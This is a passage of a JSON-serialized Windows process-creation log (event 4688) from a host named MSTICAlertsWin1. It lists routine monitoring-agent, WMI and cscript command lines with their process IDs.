State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessId\":[\"0x1610\",\"0x1790\",\"0xcd8\",\"0x28c\",\"0x1284\",\"0xb10\",\"0x2a8\",\"0x90c\",\"0x130c\",\"0xc84\",\"0x570\",\"0x28c\",\"0xb8\",\"0xd14\",\"0x1490\",\"0x148c\",\"0x1414\",\"0x1530\",\"0x7b4\",\"0x1594\",\"0x1630\",\"0x16a0\",\"0x1694\",\"0x1658\",\"0x1740\",\"0xd14\",\"0x1094\",\"0x1270\",\"0xc10\",\"0x6ec\",\"0x1388\",\"0xc08\",\"0x364\",\"0x1338\",\"0x12fc\",\"0x1128\",\"0x13fc\",\"0x123c\",\"0x13e8\",\"0x6bc\",\"0x1254\",\"0x11b0\",\"0x1d0\",\"0x1070\",\"0x6ec\",\"0xc84\",\"0x16fc\",\"0x1700\",\"0x1728\",\"0x1738\",\"0x175c\",\"0x176c\",\"0x17a8\",\"0x17a0\",\"0x17cc\",\"0x17e8\",\"0x143c\",\"0x1064\",\"0x1434\",\"0xbb4\",\"0x1404\",\"0x148c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x1550\",\"0x690\",\"0x123c\",\"0x244\",\"0xa10\"